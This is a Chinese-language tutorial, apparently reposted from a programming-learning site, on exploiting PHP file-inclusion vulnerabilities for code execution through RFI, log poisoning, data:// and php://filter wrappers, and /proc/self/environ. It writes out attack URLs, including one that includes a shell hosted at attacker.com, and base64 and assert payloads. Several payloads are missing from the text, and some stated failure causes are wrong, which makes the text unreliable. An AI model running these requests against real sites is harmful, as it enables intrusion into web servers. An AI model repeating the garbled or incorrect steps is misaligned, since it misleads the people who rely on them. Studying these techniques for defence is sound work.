文件包含触发PHP代码执行方法

本文深入解析了文件包含漏洞触发PHP代码执行的五种核心利用手法：从需特定PHP配置支持的远程文件包含（RFI）和依赖日志注入的本地文件包含（LFI），到绕过文件系统限制的data://协议与php://filter封装器技巧，再到利用Linux环境变量文件/proc/self/environ在CGI模式下的隐蔽执行——每种方法均结合真实攻击链、关键前提条件与典型绕过思路，为安全研究人员和开发者提供了兼具实战性与深度的技术指南，助你快速识别、验证并防御这一高危漏洞。

如果您在Web应用中发现存在文件包含漏洞，攻击者可能利用该漏洞加载并执行恶意PHP代码。以下是触发PHP代码执行的多种方法：

一、利用远程文件包含（RFI）加载外部PHP脚本

当目标服务器启用了allow_url_fopen或allow_url_include配置时，可通过URL参数引入远程托管的PHP代码并执行。

1、构造包含远程PHP文件的请求，例如：http://target.com/vuln.php?page=http://attacker.com/shell.php

2、确保远程服务器返回的内容为合法PHP代码，且无HTTP头干扰（如使用text/plain响应头可能导致解析失败）

3、确认目标PHP配置中allow_url_include=On且allow_url_fopen=On

二、利用本地文件包含（LFI）配合日志文件注入执行PHP

当无法直接远程包含时，可将PHP代码写入服务器可访问的日志文件（如Apache access.log），再通过LFI包含该日志文件以触发执行。

1、向目标站点发送含PHP代码的恶意请求，例如：curl -v "http://target.com/?"

2、确定Web服务器日志路径（常见为/var/log/apache2/access.log或/var/log/nginx/access.log）

3、发起LFI请求包含日志文件：http://target.com/vuln.php?page=/var/log/apache2/access.log

4、确保日志内容被当作PHP代码解析，需满足log文件扩展名被PHP处理器识别（如配置了.log为PHP类型）或使用PHP封装器

三、利用PHP封装器data://协议直接注入代码

data://封装器允许在请求中内联传输数据，若目标PHP版本支持且未禁用该封装器，可绕过文件系统限制直接执行PHP代码。

1、构造base64编码的PHP代码，例如： 编码后为PD9waHAgZWNobyAndGVzdCc7ID8+Cg==

2、构造请求：http://target.com/vuln.php?page=data://text/plain;base64,PD9waHAgZWNobyAndGVzdCc7ID8+Cg==

3、若页面输出test，则说明成功；失败可能因disable_functions中禁用了base64_decode或data://被open_basedir限制

四、利用php://filter读取并解码PHP源码后触发执行

php://filter可用于在读取文件时应用过滤器，结合base64-encode可绕过简单内容检测，并在特定条件下实现代码执行（如配合eval等动态执行函数）。

1、确认目标存在可控制输入点并最终传递给eval()、assert()或create_function()等函数

2、构造payload：?input=php://filter/convert.base64-encode/resource=vuln.php

3、解码返回的base64内容，提取其中可利用的动态执行逻辑

4、构造二次请求，使解码后的PHP代码进入执行上下文，例如：assert(base64_decode("ZWNobyAnaGVsbG8nOw=="))

五、利用/proc/self/environ注入并包含环境变量

在CGI或某些FastCGI配置下，用户可控的HTTP头（如User-Agent）会被写入/proc/self/environ，该文件可被包含并执行其中的PHP代码。

1、发送带PHP代码的User-Agent头：User-Agent:

2、尝试包含环境变量文件：http://target.com/vuln.php?page=/proc/self/environ

3、观察响应是否执行了system命令；失败原因可能为/proc/sys/kernel/yama/ptrace_scope限制或Web服务器非CGI模式运行

今天关于《文件包含触发PHP代码执行方法》的内容介绍就到此结束，如果有什么疑问或者建议，可以在golang学习网公众号下多多回复交流；文中若有不正之处，也希望回复留言以告知！